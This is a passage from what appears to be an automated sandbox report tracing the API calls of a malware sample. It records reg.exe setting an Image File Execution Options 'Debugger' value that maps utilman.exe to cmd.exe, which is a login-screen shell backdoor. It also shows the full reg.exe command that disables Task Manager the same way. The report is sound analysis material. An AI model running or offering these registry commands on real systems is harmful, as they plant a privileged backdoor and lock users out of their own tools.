(HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5cc0) returned 0x28 [0240.014] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5cc0 | out: hHeap=0x3e0000) returned 1 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb950) returned 1 [0240.014] GetProcessHeap () returned 0x3e0000 [0240.014] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb950) returned 0xb6 [0240.015] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb950 | out: hHeap=0x3e0000) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0240.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0240.015] lstrlenW (lpString="Debugger") returned 8 [0240.015] GetProcessHeap () returned 0x3e0000 [0240.015] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x12) returned 0x3fb720 [0240.015] lstrlenW (lpString="Debugger") returned 8 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.015] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0240.016] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0240.016] lstrlenW (lpString="REG_SZ") returned 6 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0240.016] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0240.016] LocalFree (hMem=0x3fb950) returned 0x0 [0240.016] SetLastError (dwErrCode=0x0) [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0240.016] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0240.017] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0240.017] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0240.017] GetProcessHeap () returned 0x3e0000 [0240.017] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x34) returned 0x3f79c0 [0240.017] SetLastError (dwErrCode=0x0) [0240.017] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x28fba0, lpdwDisposition=0x28fbc0 | out: phkResult=0x28fba0*=0x54, lpdwDisposition=0x28fbc0*=0x1) returned 0x0 [0240.018] RegQueryValueExW (in: hKey=0x54, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0240.018] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0240.018] RegSetValueExW (in: hKey=0x54, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="%windir%\\system32\\cmd.exe", cbData=0x34 | out: lpData="%windir%\\system32\\cmd.exe") returned 0x0 [0240.019] RegCloseKey (hKey=0x54) returned 0x0 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbc00) returned 1 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fbc00) returned 0xac [0240.019] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbc00 | out: hHeap=0x3e0000) returned 1 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbcc0) returned 1 [0240.019] GetProcessHeap () returned 0x3e0000 [0240.019] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fbcc0) returned 0xd8 [0240.020] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbcc0 | out: hHeap=0x3e0000) returned 1 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb720) returned 1 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb720) returned 0x12 [0240.020] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb720 | out: hHeap=0x3e0000) returned 1 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f79c0) returned 1 [0240.020] GetProcessHeap () returned 0x3e0000 [0240.020] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f79c0) returned 0x34 [0240.020] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f79c0 | out: hHeap=0x3e0000) returned 1 [0240.020] SetLastError (dwErrCode=0x0) [0240.020] GetLastError () returned 0x0 [0240.020] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x28fb20, nSize=0x0, Arguments=0x0 | out: lpBuffer="륐?") returned 0x27 [0240.021] GetLastError () returned 0x0 [0240.021] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0240.021] GetProcessHeap () returned 0x3e0000 [0240.021] GetProcessHeap () returned 0x3e0000 [0240.021] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb660) returned 1 [0240.021] GetProcessHeap () returned 0x3e0000 [0240.021] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb660) returned 0x2 [0240.021] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb660 | out: hHeap=0x3e0000) returned 1 [0240.021] GetProcessHeap () returned 0x3e0000 [0240.021] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x50) returned 0x3fb9b0 [0240.021] SetLastError (dwErrCode=0x0) [0240.021] LocalFree (hMem=0x3fb950) returned 0x0 [0240.022] __iob_func () returned 0x7fefdf72a80 [0240.022] _fileno (_File=0x7fefdf72ab0) returned 1 [0240.022] _errno () returned 0x174bb0 [0240.022] _get_osfhandle (_FileHandle=1) returned 0x10c [0240.022] _errno () returned 0x174bb0 [0240.022] GetFileType (hFile=0x10c) returned 0x3 [0240.022] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0240.022] GetConsoleOutputCP () returned 0x1b5 [0240.022] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0240.022] GetConsoleOutputCP () returned 0x1b5 [0240.023] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0xff802710, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0240.023] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 39 [0240.024] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb880) returned 1 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb880) returned 0xbc [0240.024] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb880 | out: hHeap=0x3e0000) returned 1 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb700) returned 1 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb700) returned 0x18 [0240.024] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb700 | out: hHeap=0x3e0000) returned 1 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c00) returned 1 [0240.024] GetProcessHeap () returned 0x3e0000 [0240.024] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5c00) returned 0x20 [0240.025] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c00 | out: hHeap=0x3e0000) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c90) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5c90) returned 0x1e [0240.025] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c90 | out: hHeap=0x3e0000) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6e0) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb6e0) returned 0x18 [0240.025] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6e0 | out: hHeap=0x3e0000) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5bd0) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5bd0) returned 0x20 [0240.025] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5bd0 | out: hHeap=0x3e0000) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb9b0) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb9b0) returned 0x50 [0240.025] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb9b0 | out: hHeap=0x3e0000) returned 1 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] GetProcessHeap () returned 0x3e0000 [0240.025] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a20) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5a20) returned 0x20 [0240.026] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a20 | out: hHeap=0x3e0000) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a50) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5a50) returned 0x20 [0240.026] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a50 | out: hHeap=0x3e0000) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a80) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5a80) returned 0x20 [0240.026] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5a80 | out: hHeap=0x3e0000) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ab0) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5ab0) returned 0x20 [0240.026] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ab0 | out: hHeap=0x3e0000) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb680) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.026] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb680) returned 0x18 [0240.026] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb680 | out: hHeap=0x3e0000) returned 1 [0240.026] GetProcessHeap () returned 0x3e0000 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ae0) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5ae0) returned 0x20 [0240.027] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ae0 | out: hHeap=0x3e0000) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b10) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5b10) returned 0x20 [0240.027] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b10 | out: hHeap=0x3e0000) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b40) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5b40) returned 0x20 [0240.027] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b40 | out: hHeap=0x3e0000) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b70) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5b70) returned 0x20 [0240.027] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b70 | out: hHeap=0x3e0000) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6a0) returned 1 [0240.027] GetProcessHeap () returned 0x3e0000 [0240.027] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb6a0) returned 0x18 [0240.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6a0 | out: hHeap=0x3e0000) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ba0) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5ba0) returned 0x20 [0240.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5ba0 | out: hHeap=0x3e0000) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c30) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5c30) returned 0x20 [0240.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c30 | out: hHeap=0x3e0000) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6c0) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb6c0) returned 0x18 [0240.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6c0 | out: hHeap=0x3e0000) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c60) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5c60) returned 0x20 [0240.028] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5c60 | out: hHeap=0x3e0000) returned 1 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] GetProcessHeap () returned 0x3e0000 [0240.028] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb640) returned 1 [0240.029] GetProcessHeap () returned 0x3e0000 [0240.029] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fb640) returned 0x18 [0240.029] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb640 | out: hHeap=0x3e0000) returned 1 [0240.029] exit (_Code=0) Process: id = "14" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x384c6000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0xb28 [0240.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcf0 | out: lpSystemTimeAsFileTime=0x28fcf0*(dwLowDateTime=0xa4eebdc0, dwHighDateTime=0x1d61d49)) [0240.149] GetCurrentProcessId () returned 0xb40 [0240.150] GetCurrentThreadId () returned 0xb28 [0240.150] GetTickCount () returned 0x1165e47 [0240.150] QueryPerformanceCounter (in: lpPerformanceCount=0x28fcf8 | out: lpPerformanceCount=0x28fcf8*=36032320975) returned 1 [0240.153] GetModuleHandleW (lpModuleName=0x0) returned 0xff710000 [0240.153] __set_app_type (_Type=0x1) [0240.153] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff7200d0) returned 0x0 [0240.153] __wgetmainargs (in: _Argc=0xff722140, _Argv=0xff722150, _Env=0xff722148, _DoWildCard=0, _StartInfo=0xff72215c | out: _Argc=0xff722140, _Argv=0xff722150, _Env=0xff722148) returned 0 [0240.154] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0240.155] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0240.155] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x28fcc8 | out: phkResult=0x28fcc8*=0x0) returned 0x2 [0240.156] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0240.156] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb620 [0240.156] lstrlenW (lpString="") returned 0 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x2) returned 0x3bb640 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5a00 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb660 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5a30 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5a60 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5a90 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.156] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5ac0 [0240.156] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb680 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5af0 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5b20 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5b50 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5b80 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb6a0 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5bb0 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5be0 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5c10 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x20) returned 0x3b5c40 [0240.157] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0240.157] GetProcessHeap () returned 0x3a0000 [0240.157] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0xc, Size=0x18) returned 0x3bb6c0 [0240.157] _memicmp 